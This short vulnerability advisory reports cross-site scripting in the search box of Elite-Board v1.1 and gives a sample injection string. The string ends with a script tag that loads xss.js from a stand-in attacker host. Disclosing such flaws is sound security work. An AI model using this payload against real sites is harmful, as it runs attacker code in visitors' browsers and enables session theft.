Bulletin Board Elite-Board v.1.1 suffers from XSS.
463f5f9afce5949c9f46e1ba860e0a25e21c4554c3bdddecbaaac0fbf15e7a09
Bulletin Board Elite-Board v.1.1
Homepage:
http://eng.e-board.net.ru/about/
Description:
Multipurpose multifunctional public bulletin board for your website. Easy to install and to use. Has all possible scripts functions of the same type and does not need additional modules and database. It works on any hosting.
Effected files:
search.html
Exploits & VUln:
Example of XSS attack by submitting malicious in search box:
'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}